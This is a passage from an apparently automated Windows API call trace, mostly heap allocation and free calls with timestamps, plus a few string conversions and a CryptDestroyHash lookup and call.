(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.000] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.000] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.002] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.002] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.002] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.002] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.003] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.003] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0199.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.004] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0199.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.005] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 